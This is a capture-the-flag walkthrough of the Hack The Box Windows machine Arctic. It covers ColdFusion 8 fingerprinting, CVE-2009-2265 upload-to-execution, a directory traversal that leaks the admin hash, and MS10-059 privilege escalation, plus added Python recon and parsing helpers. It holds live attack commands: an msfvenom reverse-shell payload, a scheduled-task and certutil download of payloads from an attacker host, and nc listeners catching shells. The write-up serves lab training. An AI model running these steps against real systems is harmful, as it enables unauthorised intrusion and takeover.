HTB Series: Windows Box Arctic

The 30-second response time this box is configured with is genuinely soul-crushing. Every single action is an excuse to play with your phone for a while.

Reconnaissance

nmap

nmap -sS -p 1-65535 10.10.10.11
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST
Nmap scan report for 10.10.10.11
Host is up (0.28s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds

Port 8500 is open.

Try connecting to it with nc:
nc 10.10.10.11 8500
After about thirty seconds a response comes back:
HTTP/1.0 200 OK
Date: Thu, 14 May 2020 18:48:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Server: JRun Web Server

<html>
<head>
<title>Index of /</title></head><body bgcolor="#ffffff">
<h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a>               <i>dir</i>   03/22/17 08:52 μμ
<a href="cfdocs/">cfdocs/</a>              <i>dir</i>   03/22/17 08:55 μμ
</pre><hr></html>

Open it in a browser as well: directory listing is enabled, and the CFIDE and cfdocs folders are enough to identify this as Adobe ColdFusion. Browsing to /CFIDE/administrator shows it is ColdFusion 8, so let's search for known vulnerabilities.
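As an added example (not from the original post), the same banner grab done from Python with a socket timeout long enough for this box, plus parsing of the directory listing to confirm ColdFusion. The sample response is the one captured above, re-embedded as a constant so the parsing runs offline; the host and port are the ones from the scan.

```python
import re
import socket

# Constructed sample: the reply the JRun listener on 8500 returned in the
# write-up above, re-embedded here so the parsing runs offline.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Date: Thu, 14 May 2020 18:48:18 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Connection: close\r\n"
    "Server: JRun Web Server\r\n"
    "\r\n"
    "<html><head><title>Index of /</title></head><body>"
    '<h1>Index of /</h1><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i>\n'
    '<a href="cfdocs/">cfdocs/</a> <i>dir</i>\n'
    "</pre></html>"
)


def http_get_raw(host, port, path="/", timeout=45.0):
    """Send a bare HTTP/1.0 GET over a socket and return the raw reply.

    The timeout is set well above the ~30 s this box needs to answer, so a
    slow-but-alive service is not written off as dead (plain nc has no
    timeout, which is why simply waiting worked there).
    """
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_response(raw):
    """Split a raw reply into (status line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def listing_entries(body):
    """Return the href targets of an auto-generated 'Index of' page."""
    return re.findall(r'<a href="([^"]+)"', body)


def fingerprint(raw):
    """Identify the service from the Server header plus the listing.

    JRun is the J2EE container ColdFusion 6-9 shipped on; CFIDE/ (admin UI and
    scripts) and cfdocs/ (bundled docs) are ColdFusion-specific directories.
    """
    status, headers, body = parse_response(raw)
    entries = {e.rstrip("/").lower() for e in listing_entries(body)}
    server = headers.get("server", "")
    is_cf = "jrun" in server.lower() and {"cfide", "cfdocs"} <= entries
    return {
        "status": status,
        "server": server,
        "entries": sorted(entries),
        "coldfusion": is_cf,
        "admin_url": "/CFIDE/administrator/" if is_cf else None,
    }


if __name__ == "__main__":
    import sys
    # python3 fingerprint.py 10.10.10.11  -> live grab; no argument -> sample
    raw = http_get_raw(sys.argv[1], 8500) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    print(fingerprint(raw))
```

Run it with the target IP for a live grab; without arguments it fingerprints the embedded sample. The point of the explicit timeout is the box's 30-second delay: a scanner or client that gives up after 10 seconds reports the port as dead, which is exactly the kind of false negative that costs time here.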

searchsploit coldfusion 8
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                        |  Path
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                                   | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                                | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                                   | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                           | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                         | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                             | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                                       | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                          | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting       | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting                | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting                 | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                                   | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                                         | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                               | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                                 | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure                                                             | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                                             | multiple/remote/22867.pl
---------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

In there we have an arbitrary file upload/execution (AFE) bug and the directory traversal (file read) that gets passed around all over Baidu.

So we now have two vectors for getting a shell.

Getting tolis privileges

RCE

First, the AFE vulnerability:

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                                     | cfm/webapps/16788.rb

Open this entry and take a look:

[ 'CVE', '2009-2265' ],
[ 'OSVDB', '55684' ],

We only care about this reference. The entry is a Metasploit module, which we can't use directly, so we need a standalone PoC for CVE-2009-2265; the one we use comes from exploit-db.

Note: after copying the script, edit the hosts inside the file:

import uuid

if __name__ == '__main__':
    # Define some information
    lhost = '10.10.16.4'          # attacker IP the reverse shell calls back to
    lport = 4444                  # attacker port
    rhost = "10.10.10.11"         # target
    rport = 8500                  # ColdFusion/JRun port
    filename = uuid.uuid4().hex   # random name for the uploaded payload

Change lhost and lport.

Interestingly, rhost doesn't need changing, which suggests the PoC's author wrote it while working on this very HTB box.

This script doesn't need a separate nc listener; it hands you the shell directly.

File read vulnerability

Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com), the multiple/remote/14641.py entry from the searchsploit output above

That is the exploit script. Had I looked at the official exploit-db entry earlier I wouldn't have spent half a day poking around with nothing to show for it. Lesson: skip the unreliable exploitation walkthroughs and read the original documentation.

Later, while exploiting it, I also forgot the target is Windows and went looking for files as if it were a Linux filesystem, which wasted even more time. I was convinced the bug had been patched, until I got a shell via the first method, looked at the directory layout, and only then realised the Windows filesystem is laid out differently.

Exploitation:

Just request the URL in the browser's address bar the way the exploit script does.

That reads the password file and gives you the admin password's SHA1 hash. SHA1 is not decrypted but cracked: run the hash through hashcat (mode 100) or a hash lookup, then log in to the administrator backend with the recovered password.

The admin backend has a file-upload feature, which we can combine with the file access above to get a shell.

First create a JSP payload with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp

Next, start a Python web server on the attacking machine:

python -m SimpleHTTPServer 80

Then create a scheduled task that downloads the payload from our machine:

Debugging & Logging -> Scheduled Tasks -> Schedule New Task

Put the payload's address in the URL field, http://10.10.16.7/exp.jsp, and have the task publish its output to a file inside the CFIDE directory of the webroot (the one served on port 8500); without that, the fetched page is never written to disk. Submit, and after a moment a request shows up on the Python server, at which point the upload is done.

The uploaded file then appears in the /CFIDE folder on port 8500. Start the nc listener first, then request the file in the browser to execute it:

nc -lvnp 4444

Done.

Escalating to root (SYSTEM on Windows)

Standard procedure

First check the configuration with systeminfo:

C:\>systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 
System Boot Time:          14/5/2020, 9:38:49 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use:    848 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

Then use WES (Windows Exploit Suggester) to see which patches are missing; see the tools post for usage.

root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Discarding the IE bugs, which need an interactive desktop session to exploit, still leaves plenty of usable ones:

  • MS10-047
  • MS10-059
  • MS10-061
  • MS10-073
  • MS11-011
  • MS13-005
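As an added example (not part of the post), the triage above written down as code: it parses the relevant systeminfo fields and the WES bulletin lines, drops the browser-only bulletins, and orders what is left. The inputs are the outputs shown above, embedded as constants. Build 7600 is 2008 R2 RTM (SP1 is 7601), and "Hotfix(s): N/A" means the box reports no updates at all, which is why WES compares against every bulletin in its database.

```python
import re

# Constructed input: the systeminfo fields that matter and the WES bulletin
# lines from the output above ([*] URL lines are PoC links, not findings).
SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

WES_OUTPUT = """\
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
"""

FINDING_RE = re.compile(
    r"^\[(?P<src>[EM])\]\s+(?P<id>MS\d{2}-\d{3}):\s+(?P<title>.*?)\s+"
    r"\((?P<kb>\d+)\)\s+-\s+(?P<severity>\w+)$"
)


def parse_systeminfo(text):
    """Extract OS, build and installed hotfixes from systeminfo output.

    'Hotfix(s): N/A' means no updates are reported at all; build 7600 is
    2008 R2 RTM (SP1 would be 7601), consistent with an unpatched box.
    """
    fields = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if sep and not line.startswith(" "):      # skip indented [01]: lines
            fields[name.strip()] = value.strip()
    build = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    hotfix_field = fields.get("Hotfix(s)", "")
    hotfixes = [] if hotfix_field in ("", "N/A") else re.findall(r"KB\d+", text)
    return {
        "os": fields.get("OS Name"),
        "build": build.group(1) if build else None,
        "arch": fields.get("System Type"),
        "hotfixes": hotfixes,
    }


def parse_wes(text):
    """Turn WES bulletin lines into dicts; [*] link lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = FINDING_RE.match(line.strip())
        if m:
            f = m.groupdict()
            f["local_privesc"] = "Elevation of Privilege" in f["title"]
            findings.append(f)
    return findings


# Bulletins that only matter with a user driving a browser on the box; from a
# web shell on a headless server they are noise.
CLIENT_SIDE_MARKERS = ("Internet Explorer",)


def triage(findings, keep_client_side=False):
    """Drop browser-only bulletins and order the rest by bulletin id."""
    kept = [
        f for f in findings
        if keep_client_side or not any(m in f["title"] for m in CLIENT_SIDE_MARKERS)
    ]
    return sorted(kept, key=lambda f: f["id"])


def bulletin_ids(findings):
    return [f["id"] for f in findings]


if __name__ == "__main__":
    print(parse_systeminfo(SYSTEMINFO))
    for f in triage(parse_wes(WES_OUTPUT)):
        kind = "EoP" if f["local_privesc"] else "other"
        print(f"{f['id']} [{f['src']}] {kind:5} {f['title']} (KB{f['kb']})")
```

The `local_privesc` flag separates the kernel and service EoP bulletins from MS10-061, which is a Print Spooler RCE; it is still on the list because it is not browser-bound, but from a shell that is already on the box an EoP is the more direct route, which is why the next step picks MS10-059.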

Following 0xdf, we use MS10-059, with the compiled exploit from egre55's GitHub.

This one is simple.

After downloading it:

Serve it with a Python web server and pull it over to the target with certutil:

python -m SimpleHTTPServer 80

certutil.exe -urlcache -split -f "http://10.10.16.7/2.exe" 1.exe    (download)

.\1.exe 10.10.16.7 4444    (run, with the listener's IP and port as arguments)

Remember to have nc listening to catch the shell it sends back.

 
